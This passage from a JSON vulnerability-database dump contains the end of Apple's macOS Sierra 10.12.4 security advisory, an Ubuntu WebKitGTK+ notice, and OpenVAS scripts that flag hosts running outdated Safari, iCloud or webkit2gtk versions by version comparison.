execution\n\nDescription: An uncontrolled format string issue was addressed through improved input validation.\n\nCVE-2017-2403: beist of GrayHash\n\n**python**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing maliciously crafted zip archives with Python may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the handling of zip archives. 
This issue was addressed through improved input validation.\n\nCVE-2016-5636\n\n**QuickTime**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Viewing a maliciously crafted media file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in QuickTime. This issue was addressed through improved memory handling.\n\nCVE-2017-2413: Simon Huang (@HuangShaomang) and pjf of IceSword Lab of Qihoo 360\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: A validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**SecurityFoundation**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted certificate may lead to arbitrary code execution\n\nDescription: A double free issue was addressed through improved memory management.\n\nCVE-2017-2425: kimyok of Tencent Security Platform Department\n\n**sudo**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A user in a group named \"admin\" on a network directory server may be able to unexpectedly escalate privileges using sudo\n\nDescription: An access issue existed in sudo. 
This issue was addressed through improved permissions checking.\n\nCVE-2017-2381\n\n**System Integrity Protection**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: A malicious application may be able to modify protected disk locations\n\nDescription: A validation issue existed in the handling of system installation. This issue was addressed through improved handling and validation during the installation process.\n\nCVE-2017-6974: Patrick Wardle of Synack\n\n**tcpdump**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code with user assistance\n\nDescription: Multiple issues existed in tcpdump before 4.9.0. These were addressed by updating tcpdump to version 4.9.0.\n\nCVE-2016-7922\n\nCVE-2016-7923\n\nCVE-2016-7924\n\nCVE-2016-7925\n\nCVE-2016-7926\n\nCVE-2016-7927\n\nCVE-2016-7928\n\nCVE-2016-7929\n\nCVE-2016-7930\n\nCVE-2016-7931\n\nCVE-2016-7932\n\nCVE-2016-7933\n\nCVE-2016-7934\n\nCVE-2016-7935\n\nCVE-2016-7936\n\nCVE-2016-7937\n\nCVE-2016-7938\n\nCVE-2016-7939\n\nCVE-2016-7940\n\nCVE-2016-7973\n\nCVE-2016-7974\n\nCVE-2016-7975\n\nCVE-2016-7983\n\nCVE-2016-7984\n\nCVE-2016-7985\n\nCVE-2016-7986\n\nCVE-2016-7992\n\nCVE-2016-7993\n\nCVE-2016-8574\n\nCVE-2016-8575\n\nCVE-2017-5202\n\nCVE-2017-5203\n\nCVE-2017-5204\n\nCVE-2017-5205\n\nCVE-2017-5341\n\nCVE-2017-5342\n\nCVE-2017-5482\n\nCVE-2017-5483\n\nCVE-2017-5484\n\nCVE-2017-5485\n\nCVE-2017-5486\n\n**tiffutil**\n\nAvailable for: macOS Sierra 10.12.3\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. 
This was addressed by updating LibTIFF in AKCmds to version 4.0.7.\n\nCVE-2016-3619\n\nCVE-2016-9533\n\nCVE-2016-9535\n\nCVE-2016-9536\n\nCVE-2016-9537\n\nCVE-2016-9538\n\nCVE-2016-9539\n\nCVE-2016-9540\n\nmacOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite includes the security content of [Safari 10.1](<https://support.apple.com/kb/HT207600>).\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: August 29, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of macOS Sierra 10.12.4, Security Update 2017-001 El Capitan, and Security Update 2017-001 Yosemite", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0736", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-2161", "CVE-2016-3619", "CVE-2016-4688", "CVE-2016-5387", "CVE-2016-5636", "CVE-2016-7056", "CVE-2016-7585", "CVE-2016-7922", "CVE-2016-7923", "CVE-2016-7924", "CVE-2016-7925", "CVE-2016-7926", "CVE-2016-7927", "CVE-2016-7928", "CVE-2016-7929", "CVE-2016-7930", "CVE-2016-7931", "CVE-2016-7932", "CVE-2016-7933", "CVE-2016-7934", "CVE-2016-7935", "CVE-2016-7936", "CVE-2016-7937", "CVE-2016-7938", "CVE-2016-7939", "CVE-2016-7940", "CVE-2016-7973", "CVE-2016-7974", "CVE-2016-7975", "CVE-2016-7983", "CVE-2016-7984", "CVE-2016-7985", "CVE-2016-7986", "CVE-2016-7992", "CVE-2016-7993", "CVE-2016-8574", "CVE-2016-8575", "CVE-2016-8740", "CVE-2016-8743", "CVE-2016-9533", "CVE-2016-9535", "CVE-2016-9536", "CVE-2016-9537", "CVE-2016-9538", "CVE-2016-9539", "CVE-2016-9540", "CVE-2016-9586", "CVE-2016-9935", "CVE-2017-2379", "CVE-2017-2381", "CVE-2017-2388", "CVE-2017-2390", "CVE-2017-2398", "CVE-2017-2401", "CVE-2017-2402", "CVE-2017-2403", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2408", "CVE-2017-2409", "CVE-2017-2410", "CVE-2017-2413", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2418", "CVE-2017-2420", "CVE-2017-2421", "CVE-2017-2422", "CVE-2017-2423", "CVE-2017-2425", "CVE-2017-2426", "CVE-2017-2427", "CVE-2017-2428", "CVE-2017-2429", "CVE-2017-2430", "CVE-2017-2431", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2436", "CVE-2017-2437", "CVE-2017-2438", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2443", "CVE-2017-2448", "CVE-2017-2449", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2467", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", 
"CVE-2017-2477", "CVE-2017-2478", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2489", "CVE-2017-2490", "CVE-2017-5029", "CVE-2017-5202", "CVE-2017-5203", "CVE-2017-5204", "CVE-2017-5205", "CVE-2017-5341", "CVE-2017-5342", "CVE-2017-5482", "CVE-2017-5483", "CVE-2017-5484", "CVE-2017-5485", "CVE-2017-5486", "CVE-2017-6974", "CVE-2017-7070"], "modified": "2017-03-27T00:00:00", "id": "APPLE:E8FF9F04ED54DD8E8D5B899FB4A8000E", "href": "https://support.apple.com/kb/HT207615", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:14:22", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and \nJavaScript engines. If a user were tricked into viewing a malicious \nwebsite, a remote attacker could exploit a variety of issues related to web \nbrowser security, including cross-site scripting attacks, denial of service \nattacks, and arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-10T00:00:00", "type": "ubuntu", "title": "WebKitGTK+ vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2017-2367", "CVE-2017-2396", "CVE-2017-2454", "CVE-2017-2466", "CVE-2017-2415", "CVE-2017-2395", "CVE-2016-9643", "CVE-2017-2377", "CVE-2017-2471", "CVE-2017-2445", "CVE-2017-2468", "CVE-2017-2376", "CVE-2017-2386", "CVE-2017-2469", "CVE-2017-2364", "CVE-2017-2455", "CVE-2016-9642", "CVE-2017-2446", "CVE-2017-2459", "CVE-2017-2457", "CVE-2017-2481", "CVE-2017-2405", "CVE-2017-2447", "CVE-2017-2394", "CVE-2017-2464", "CVE-2017-2419", "CVE-2017-2465", "CVE-2017-2460", "CVE-2017-2476", "CVE-2017-2442", "CVE-2017-2433", "CVE-2017-2470", "CVE-2017-2475", "CVE-2017-2392"], "modified": "2017-04-10T00:00:00", "id": "USN-3257-1", "href": "https://ubuntu.com/security/notices/USN-3257-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:34:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3257-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9643", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2376", "CVE-2017-2419", "CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2392", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2394", "CVE-2017-2457", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2445", "CVE-2017-2476"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843130", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843130", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for webkit2gtk USN-3257-1\n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843130\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-11 06:33:11 +0200 (Tue, 11 Apr 2017)\");\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",\n \"CVE-2017-2376\", \"CVE-2017-2377\", \"CVE-2017-2386\", \"CVE-2017-2392\", \"CVE-2017-2394\",\n \"CVE-2017-2395\", \"CVE-2017-2396\", \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\",\n \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\", \"CVE-2017-2447\",\n \"CVE-2017-2454\", \"CVE-2017-2455\", \"CVE-2017-2457\", \"CVE-2017-2459\", \"CVE-2017-2460\",\n \"CVE-2017-2464\", \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",\n \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",\n \"CVE-2017-2481\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3257-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were\n discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked\n into viewing a malicious website, a remote attacker could exploit a variety of\n issues related to web browser security, including cross-site scripting attacks,\n denial of service attacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 16.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3257-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3257-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.1-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:i386\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18:amd64\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:i386\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37:amd64\", ver:\"2.16.1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:20", "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities-HT207600", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9643", "CVE-2017-2389", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2442", "CVE-2017-2395", "CVE-2017-2447", "CVE-2017-2433", "CVE-2017-2459", "CVE-2017-2454", "CVE-2017-7071", "CVE-2017-2471", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2465", "CVE-2017-2446", "CVE-2017-2405", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2378", "CVE-2017-2419", 
"CVE-2017-2377", "CVE-2017-2466", "CVE-2017-2364", "CVE-2017-2481", "CVE-2017-2453", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2424", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2445", "CVE-2017-2476", "CVE-2017-2385"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310810727", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810727", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities-HT207600\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810727\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2016-9642\", \"CVE-2016-9643\", \"CVE-2017-2364\", \"CVE-2017-2367\",\n \"CVE-2017-2377\", \"CVE-2017-2378\", \"CVE-2017-2385\", \"CVE-2017-2386\",\n \"CVE-2017-2389\", \"CVE-2017-2394\", \"CVE-2017-2395\", \"CVE-2017-2396\",\n \"CVE-2017-2405\", \"CVE-2017-2415\", \"CVE-2017-2419\", \"CVE-2017-2424\",\n \"CVE-2017-2433\", \"CVE-2017-2442\", \"CVE-2017-2445\", \"CVE-2017-2446\",\n \"CVE-2017-2447\", \"CVE-2017-2453\", \"CVE-2017-2454\", \"CVE-2017-2455\",\n \"CVE-2017-2459\", \"CVE-2017-2460\", \"CVE-2017-2463\", \"CVE-2017-2464\",\n \"CVE-2017-2465\", \"CVE-2017-2466\", \"CVE-2017-2468\", \"CVE-2017-2469\",\n \"CVE-2017-2470\", \"CVE-2017-2471\", \"CVE-2017-2475\", \"CVE-2017-2476\",\n \"CVE-2017-2479\", \"CVE-2017-2480\", \"CVE-2017-2481\", \"CVE-2017-7071\");\n script_bugtraq_id(94554, 94559, 95725, 97130, 97129, 97136, 97143, 97176, 97133,\n 100613);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 16:41:59 +0530 (Fri, 31 Mar 2017)\");\n script_name(\"Apple Safari Multiple Vulnerabilities-HT207600\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the 
target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple memory corruption issues,\n\n - A state management issue,\n\n - A spoofing and denial-of-service issue existed in the handling\n of HTTP authentication,\n\n - A spoofing issue existed in the handling of FaceTime prompts,\n\n - A keychain handling issue in keychain item management,\n\n - A prototype access issue in exception handling,\n\n - Multiple memory corruption issues in input validation,\n\n - Multiple memory corruption issues in memory handling,\n\n - A type confusion issue in memory handling,\n\n - An access issue existed in Content Security Policy,\n\n - An uncontrolled resource consumption issue in regex processing,\n\n - An information disclosure issue existed in the processing of OpenGL shaders,\n\n - A memory corruption issue in input validation,\n\n - Multiple validation issues existed in the handling of page loading,\n\n - A validation issue existed in the handling of page loading,\n\n - A logic issue existed in the handling of frame objects,\n\n - A logic issue existed in the handling of strict mode functions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose sensitive information and can also lead to arbitrary\n code execution.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 10.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 10.1 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207600\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n 
exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nsafVer = infos['version'];\npath = infos['location'];\n\n\nif(version_is_less(version:safVer, test_version:\"10.1\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"10.1\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:20:34", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "openvas", "title": "Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2479", "CVE-2017-2480", "CVE-2017-5029", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2383"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810983", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810983\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-2493\", \"CVE-2017-2480\", \"CVE-2017-2479\", \"CVE-2017-2463\",\n \"CVE-2017-5029\", \"CVE-2017-2383\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 14:51:38 +0530 (Tue, 16 May 2017)\");\n script_name(\"Apple iCloud Multiple Vulnerabilities-HT207607 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - A validation issue existed in element handling.\n\n - Multiple memory corruption issues.\n\n - Poor certificate handling.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to execute arbitrary code, track a user's activity and exfiltrate\n data cross-origin.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 6.2\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 6.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", 
value:\"https://support.apple.com/en-us/HT207607\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!icVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:icVer, test_version:\"6.2\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"6.2\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:22", "description": "This host is running Apple Mac OS X and\n is prone to multiple memory corruption vulnerabilities.", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "openvas", "title": "Apple Mac OS X Multiple Memory Corruption Vulnerabilities-HT207615", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5029", "CVE-2017-2432"], "modified": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310810994", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810994", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Memory Corruption Vulnerabilities-HT207615\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
